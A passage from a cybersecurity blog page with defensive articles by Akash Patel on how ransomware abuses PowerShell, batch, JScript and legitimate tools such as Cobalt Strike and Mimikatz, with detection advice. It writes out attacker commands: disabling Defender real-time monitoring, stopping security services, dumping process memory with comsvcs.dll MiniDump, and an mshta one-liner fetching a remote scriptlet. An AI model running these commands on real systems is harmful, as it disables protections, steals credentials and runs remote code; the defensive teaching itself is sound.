foothold on compromised systems.. Each technique presents its unique challenges for detection, but by understanding how these methods work and regularly monitoring key system artifacts—such as registry entries, scheduled tasks, services, and WMI subscriptions—security professionals can identify and mitigate persistence mechanisms before they escalate into more significant threats. Akash Patel

  • Dark Side of Scripting: How Ransomware Abuses Powerful Tools

    Ransomware attacks have become increasingly sophisticated, leveraging every tool at their disposal to wreak havoc. Among these tools, scripting languages like PowerShell, batch scripts, JavaScript, and Visual Basic scripting have become favorites for attackers. These languages are powerful and versatile, making them ideal for automating tasks, but in the wrong hands, they can be used to execute some pretty nasty stuff. PowerShell: A Double-Edged Sword PowerShell is a powerhouse in the world of scripting. It's like the Swiss Army knife of Windows, capable of doing almost anything from managing files to interacting with the Win32 API and .NET framework assemblies. This flexibility is a boon for system administrators, but it also makes PowerShell an attractive tool for cybercriminals. Why Ransomware Loves PowerShell: Post-Exploitation Frameworks:  Tools like Empire and PowerSploit are written in PowerShell, allowing attackers to execute a wide range of post-exploitation activities. Obfuscation:  Daniel Bohannon’s Invoke-Obfuscation   project makes it easy to hide malicious PowerShell commands. Combine this with his DOSfuscation techniques , and you’ve got a recipe for highly obfuscated, hard-to-detect scripts. Elastic Syntax:  PowerShell’s flexible parameter syntax means attackers can shorten commands, making them less obvious in logs. For example, instead of using -ExecutionPolicy Unrestricted, an attacker might just use -ex Unrestricted. PowerShell Logging: Tracking PowerShell Misuse: PowerShell isn’t just powerful for attackers; it’s also great for defenders. For example, the PSReadLine module in PowerShell keeps a history of commands for each user. This can be a goldmine when investigating an attack, especially if the attacker’s credentials are captured in the history. You can find these history files at: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt Batch Scripts: The Silent Executors Batch scripts might seem old school, but they’re still a favorite among ransomware authors. These .bat files can be incredibly sneaky, often executing without leaving much of a trace. What Makes Batch Scripts Dangerous: Lack of Default Logging:  By default, Windows doesn’t log batch script execution. This means that unless you’ve enabled process auditing or have an EDR solution in place, you might not even know a script has run. Self-Destruction:   Batch scripts can delete themselves after execution, making it harder to track what happened. I magine a PE file dropping a batch script that deletes the original file and then itself—tricky to trace, right? Where to Look: Keep an eye on Shimcache, where batch files might leave a trace even after they’ve deleted themselves. JavaScript and Visual Basic: Not Just for the Web Most people think of JavaScript as the language of the web, but did you know that Microsoft’s Windows Script Host (WSH) can also run JavaScript on your local machine? This is done through wscript.exe, which executes .js files. How Attackers Use JavaScript: Direct Execution:  Attackers can run JavaScript files directly using the CLI version of WSH (cscript.exe), making it easy to execute scripts with a double-click. Obfuscation and Malicious Code:  Just like PowerShell, JavaScript can be obfuscated to hide malicious intent. Attackers often use this to bypass detection mechanisms. Learn more about Microsoft’s JScript at https://en.wikipedia.org/wiki/JScript . Learn more about ECMAScript at https://en.wikipedia.org/wiki/ECMAScript . Conclusion: Staying One Step Ahead Ransomware isn’t going away anytime soon, and as defenders, we need to stay vigilant. By understanding how scripting engines are abused, we can better prepare ourselves to detect and respond to these threats. Whether it’s through enabling logging, monitoring specific directories, or simply staying informed, every little bit helps in the fight against ransomware. So, the next time you see a suspicious script running on your network, don’t brush it off. It might just be the tip of the iceberg. Akash Patel

  • Ransomware Tactics: Leveraging Legitimate Tools and Advanced Techniques

    Ransomware actors have increasingly shifted their tactics, techniques, and procedures (TTPs) to include the use of legitimate commercial and open-source software rather than relying solely on their custom-built webshells or malware. This shift is often referred to as "Bring Your Own Tools" (BYOT), where threat actors use trusted and widely available tools for malicious purposes. Ransomware Actors' Arsenal: From Webshells to Commercial Tools Ransomware actors are now using a variety of free, commercial, and open-source software in their attacks. Some of the most commonly used tools include: BloodHound : A tool that identifies and exploits misconfigurations in Active Directory environments. WinSCP : A popular free SFTP, FTP, WebDAV, and SCP client. PoshC2 : A command and control framework that is often used for post-exploitation. Cobalt Strike : A commercial adversary simulation tool used to emulate advanced threats. Brute Ratel : A red-teaming tool designed to evade detection by EDR and AV solutions. AdFind : An LDAP query tool used to gather information from Active Directory. These tools are often utilized by ransomware operators to move laterally, gather intelligence, and escalate privileges within a compromised environment. The Darknet Marketplace: Where Exploits and Tools Are Sold If you explore darknet forums, you’ll find that commercial tools like CANVAS, Cobalt Strike, and Core Impact are often available for sale. These tools, originally developed for legitimate purposes such as penetration testing, are being weaponized by ransomware groups to compromise networks. Example of a Darknet Forum Selling Exploits BYOT: Bring Your Own Tools The BYOT approach is now a staple in ransomware campaigns. By utilizing cloud-based file-sharing sites like Google Drive, Dropbox, and Box, threat actors can easily bring these tools into a target environment without raising suspicion. It’s crucial for organizations to block and alert on these domains to prevent such tactics. Monitoring & Alerting Domains/URLs : 7zip : Download AdFind : Download Advanced IP Scanner : Download Angry IP Scanner : Download AnyDesk : Download Procdump : Download Process Hacker : Download PsTools/PsExec : Download rclone : Download WinSCP : Portable  | Full Commonly Accessed GitHub Repositories : BloodHound : Releases Lazagne : Releases Mimikatz : Releases PowerSploit/PowerView : Releases PowerUp : Releases Rubeus : Source  | Binary Seatbelt : Source  | Binary SharpView : Compiled Living Off Trusted Sites (LOTS) Project : mrd0x maintains the Living Off Trusted Sites (LOTS) Project , cataloging sites used frequently for BYOT, data exfiltration, phishing, and other malicious activities. It’s essential to monitor and alert on such domains to prevent and detect these activities. Bypassing Security Software Once attackers gain initial access, they often need to disable security mechanisms to execute their payloads. Disabling real-time monitoring in Windows Defender, for instance, can be done easily if the attacker has admin privileges: Set-MpPreference -DisableRealtimeMonitoring $True Unfortunately, many organizations do not monitor for invocations of Set-MpPreference. With the ease of disabling Defender's real-time monitoring, it becomes clear why having a robust backup solution is critical. Common Bypass Tools & Techniques : GMER, Hitman Pro, PC Hunter, Process Hacker : Tools used to disable security mechanisms. Process Hacker, for example, can identify and disable security product services, loaded libraries, and more. BYOVD (Bring Your Own Vulnerable Driver) : This involves bringing a signed kernel driver into the environment that is vulnerable to attack, providing a low level of access for disabling security mechanisms such as AV, EPP, and EDR services. Common Drivers Used in Ransomware Attacks : aswArPot.sys  (Avast) gdrv.sys  (Gigabyte) mhyprot2.sys  (Genshin Impact) DLL Hijacking : Wietze Beukema's Hijack Libs  project offers an overview of DLL Hijacking, where legitimate DLLs are replaced or hijacked by malicious actors. LOLBAS commands: Rather than use a dedicated tool to find and kill security product services and processes, the LOLBAS commands sc, net, and taskkill can do the job: Service Identification and Termination : sc Command : Example: sc stop [service_name] can be used to stop a specific service. net Command : Example: net stop [service_name] will halt the identified service. Process Identification and Termination : Task Manager and tasklist Command : Once a process is identified, taskkill can be used to stop it. PowerShell Cmdlets : Get-Service/Stop-Service : These cmdlets allow administrators (and attackers) to query and stop services, respectively. Get-Process/Stop-Process : These cmdlets are used to query and terminate running processes. LOLBINs & Native Execution Methods Ransomware actors often use legitimate binaries, also known as LOLBINs (Living Off the Land Binaries), to execute malicious commands: regsvr32 : Registers DLLs. rundll32 : Executes functions directly from DLLs. bitsadmin : Administers the Background Intelligent Transfer Service (BITS). msbuild : CLI compiler for Visual Studio. msiexec : Windows Installer for installing programs and tools. mshta : Executes HTML Applications (HTA) code. winrs and wmic : Used for remote command execution. wsl : Windows Subsystem for Linux, abused for execution and persistence. Example Commands : 1. cmd.exe /k [malicious command] 2. powershell.exe -c rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 4242 C:\WINDOWS\TEMP full 3. regsvr32 c:\users\public\legit.dll 4. mshta.exe vbscript:Close(Execute("GetObject("script:http://1.1.1.1/not_malicious.sct")")) Windows Management Instrumentation (WMI) WMI has been around for many years and is commonly used by ransomware actors for persistence and lateral movement. Below are the key components and methods associated with WMI in ransomware cases: Key WMI Components : wmic.exe : General CLI tool to interact with WMI. wmiprvse.exe : Service handling WMI commands, often seen in remote WMI activity. wsmprovhost.exe : Runs on the remote host if PSRemoting is used. mofcomp.exe : MOF (Managed Object File) compiler used to insert data into the WMI database. WMI Commands : wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List WMI is often used by ransomware actors to launch processes with "Medium" integrity. Some malware calls itself using WMIC via process call create [bad_stuff_here] to elevate privileges on the system. Detecting WMIC Execution : To detect WMI-based attacks, monitor processes launched by WMIC with medium integrity and unusual invocations. For detailed WMI analysis, collect the WMI database files located at %SystemRoot%\System32\Wbem\Repository\. Enable WMI Tracing : Wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true WMI Course: A Deep Dive I’ve created an in-depth course on WMI, covering its capabilities, stealthy persistence techniques, and how to detect and defend against WMI-based attacks. Check out the full course below: https://www.cyberengage.org/post/part-1-wmi-a-deep-dive-into-its-capabilities-and-stealthy-persistence-techniques https://www.cyberengage.org/post/part-2-wmi-detecting-and-defending-against-wmi-based-attacks https://www.cyberengage.org/post/part-3-wmi-understanding-wmi-event-consumers-in-cybersecurity https://www.cyberengage.org/post/part-4-wmi-the-intricacies-of-mof-files-a-gateway-for-malicious-infiltration-in-wmi https://www.cyberengage.org/post/part-5-wmi-unveiling-the-persistence-of-malicious-mof-files-a-deep-dive-into-pragma-autorecov https://www.cyberengage.org/post/part-6-wmi-hunting-down-malicious-wmi-activity Akash Patel

bottom of page